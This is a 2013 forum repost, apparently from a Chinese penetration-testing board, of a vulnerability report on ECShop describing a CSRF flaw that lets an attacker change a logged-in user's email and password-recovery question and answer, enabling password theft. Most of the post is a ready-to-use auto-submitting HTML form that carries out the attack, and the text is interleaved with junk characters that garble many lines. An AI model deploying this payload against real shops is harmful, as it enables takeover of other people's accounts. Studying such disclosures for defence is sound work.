中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
) @& f) t$ M- r& {# f* h, U$ Xecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现- X" O# H+ z- d. ^( R; O

8 b, x, U# e, |( h" A8 x* ~Demo For:http://www.wooyun.org/bug.php?action=view&id=395
. D, ]) J* c) X6 e9 L6 ^$ s
0 n" P6 T3 D: h6 w0 `详细说明:
& F7 e9 n! f' B; J+ S- T0 N* T利用csrf和xss可以突破官方所说的“障碍”
( ^$ z* @- Q7 G7 V7 ?3 @# A$ V( j. Gxss版本已经有人说明! ?, J6 F+ I8 |; v! D$ y- g
这里给出csrf版本$ l  M% W/ U' ~1 Z4 z9 K( Z6 ~8 l

% A$ O% b* u6 e' n& g( Q* L! L漏洞证明:
  J2 {9 Q+ G% C1 d<html>
2 A2 j9 j5 T3 W5 m- _+ X( {<body>
* `+ P5 K% G. I0 J0 X( y0 W2 O<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
0 e( }$ b/ v- Z: g" O& A<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">! Q; D1 r  ^2 f, K+ ^
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
( I1 |5 n2 z0 |5 }: r  ^& G" [<INPUT TYPE="text" NAME="sel_question" value="ecshop">
7 W) `+ Z2 X6 {7 I<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
' X! p- S# \2 @# T</body>, s. I4 T% V& `
<script>) H  v# Q/ s" _: y+ o! @
document.forms[0].submit();0 y9 a% d  z: g2 @
</script>: ^' \6 i' t& }/ }
</html>
% C5 ]# c% u) y$ Q( R2 \: H构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失8 w" A+ a9 ]8 O# l5 c3 o* @
& O4 C# I0 {! v. W





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2